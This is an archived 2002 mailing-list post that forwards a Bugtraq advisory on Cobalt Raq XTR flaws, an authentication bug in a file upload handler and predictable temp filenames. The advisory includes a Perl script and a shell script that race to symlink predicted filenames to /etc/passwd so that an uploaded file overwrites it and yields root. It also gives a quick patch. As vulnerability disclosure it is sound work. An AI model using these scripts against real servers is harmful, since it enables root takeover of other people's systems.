[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[cobalt-security] Remote Cobalt Raq XTR vulns (fwd)
- Subject: [cobalt-security] Remote Cobalt Raq XTR vulns (fwd)
- From: ProServe - Peter Batenburg <peter@xxxxxxxxxxx>
- Date: Fri, 8 Mar 2002 20:19:56 +0100 (CET)
- Organization: ProServe (http://www.proserve.nl)
- List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>
Whoopsy, I gues Sun/Cobalt got their hands full these months.
Met vriendelijke groet/With kind regards,
Peter Batenburg
ProServe B.V.
Prisma 100
3364 DJ Sliedrecht
Tel.: 0184 - 423 815
Fax: 0184 - 417 160
http://www.proserve.nl
**********************************************************************
This email and any files transmitted with it are confidential and
intended solely for the use of the individual or entity to whom they
are addressed. If you have received this email in error please notify
the sender by replying the email and please remove
the files from your computer.
This footnote also confirms that this email message has been swept
for the presence of computer viruses.
**********************************************************************
---------- Forwarded message ----------
Date: Fri, 08 Mar 2002 19:32:38 +0100
From: W. ter Maat - Digit-Labs Information Security <termaat@xxxxxxxxxxxxxx>
To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Remote Cobalt Raq XTR vulns
-----------------------------------------------------------------
Topic : Combined (Remote/Local root) Cobalt XTR vulnerabilities
Date : 02-03-2002
Author : Wouter ter Maat aka grazer@xxxxxxxxxxxxxx
Url : http://www.digit-labs.org
-----------------------------------------------------------------
Description : Some areas of the Cobalt XTR UI are not .htaccess protected,
Therefore users can access MultiFileUpload.php
from remote.
MultiFileUploadHandler.php handles upload request
posted from MultiFileUpload.php.
Due to an authentication bug in the upload Handler,
users can write files to the filesystem as any
valid user on the system, including root.
Exploitation : To exploit this vulnerability, you need shell access
(or be creative).
----- snippet of MultiFileUPload.php -----
// get uid
$pwnam = posix_getpwnam($PHP_AUTH_USER);
$uid = $pwnam["uid"];
// get filename
$baseName = base64_encode(time());
$fullName = "/tmp/" . $baseName;
------------------------------------------
As you can see, user information is read to $pwnam, which
is the return value of function posix_getpwnam($PHP_AUTH_USER);
PHP_AUTH_USER can be modified to each desired value (remote)
(i prefer root :P).
The Next problem, lies in the base64 encoding of the filename,
which is predictable. If you can predict the base64 filenames
for example the next ten minutes (time()), and create symbolic
links to /etc/passwd, you will have exactly ten minutes to
exploit the machine.
After the symlinks have been created (script to create base64
symlink is below), you will need to upload your modified
target file (script set to /etc/passwd).
You can upload your file at
https://<cobalt_xtr_host>:81/uifc/MultFileUploadHandler.php
(if you know how forms work, and understand the
authentication error :P).
Quick patch : Create a .htaccess file in the uifc directory.
Vendor status : Sun Cobalt was notified at the day of writing.
-> Explotation and further technical info can be found here:
http://www.securitydatabase.net/forum/viewtopic.php?TopicID=3665
---------------- local-timerace-xtr.pl -----------------
#!/usr/bin/perl
# mass base64 time encoder
# part of Cobalt UIFC XTR remote/local combination attack
use MIME::Base64;
$evil_time = time();
$exploit_secs = 10; # time in seconds you got to exploit this bug (race)
for($i=1;$i<=$exploit_secs; $i++) {
$evil_time = $evil_time+1;
$evilstr = encode_base64($evil_time);
print $evilstr;
}
-------------------------------------------------------
------------------- symlink-time.sh -------------------
#!/bin/sh
#Script for creating symlinks from output of local-timerace-xtr
for foo in `perl -x xtr-timerace-xtr.pl`
do
ln -s /etc/passwd $foo
done
-------------------------------------------------------